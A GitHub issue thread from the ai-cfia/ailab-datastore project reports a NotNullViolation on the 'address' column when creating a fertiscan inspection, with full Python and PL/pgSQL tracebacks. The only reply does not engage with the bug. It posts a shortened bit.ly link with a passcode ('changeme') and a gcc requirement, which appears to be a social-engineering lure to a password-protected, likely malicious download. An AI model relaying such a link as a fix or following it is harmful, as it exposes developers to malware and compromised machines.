### ISSUE TITLE
NotNullViolation while trying to create a new inspection in `fertiscan`

### ISSUE THREAD

**Issue by k-allagbe** [ai-cfia/ailab-datastore#145]
Using the deployed fertiscan, and analyzing this image:
![image](https://github.com/user-attachments/assets/c5c5b9de-2b38-46e1-846d-e929a57b064d)

Error logs:
```
2024-09-05 13:14:57,716 - __main__ - ERROR - Error occurred: Datastore Inspection Creation Error
2024-09-05 13:14:57,717 - __main__ - ERROR - Traceback: Traceback (most recent call last):
  File "/usr/local/lib/python3.11/site-packages/datastore/db/queries/inspection/__init__.py", line 78, in new_inspection_with_label_info
    cursor.execute(query, (user_id, picture_set_id, label_json))
  File "/usr/local/lib/python3.11/site-packages/psycopg/cursor.py", line 732, in execute
    raise ex.with_traceback(None)
psycopg.errors.NotNullViolation: null value in column "address" violates not-null constraint
DETAIL:  Failing row contains (e771ada6-7217-4b77-ae5d-6ad8bcea23d4, null, null, null, null).
CONTEXT:  SQL statement "INSERT INTO location (address)
        VALUES (
            input_json->'manufacturer'->>'address'
        )
        RETURNING id"
PL/pgSQL function new_inspection(uuid,uuid,jsonb) line 61 at SQL statement
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/site-packages/datastore/fertiscan/__init__.py", line 83, in register_analysis
    analysis_db = inspection.new_inspection_with_label_info(
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/site-packages/datastore/db/queries/inspection/__init__.py", line 81, in new_inspection_with_label_info
    raise InspectionCreationError(e.__str__())
datastore.db.queries.inspection.InspectionCreationError: null value in column "address" violates not-null constraint
DETAIL:  Failing row contains (e771ada6-7217-4b77-ae5d-6ad8bcea23d4, null, null, null, null).
CONTEXT:  SQL statement "INSERT INTO location (address)
        VALUES (
            input_json->'manufacturer'->>'address'
        )
        RETURNING id"
PL/pgSQL function new_inspection(uuid,uuid,jsonb) line 61 at SQL statement
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
  File "/app/app.py", line 203, in create_inspection
    inspection = asyncio.run(
                 ^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/asyncio/runners.py", line 190, in run
    return runner.run(main)
           ^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/asyncio/runners.py", line 118, in run
    return self._loop.run_until_complete(task)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/asyncio/base_events.py", line 654, in run_until_complete
    return future.result()
           ^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/site-packages/datastore/fertiscan/__init__.py", line 88, in register_analysis
    raise Exception("Datastore Inspection Creation Error")
Exception: Datastore Inspection Creation Error

```

**Comment by z3t444** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
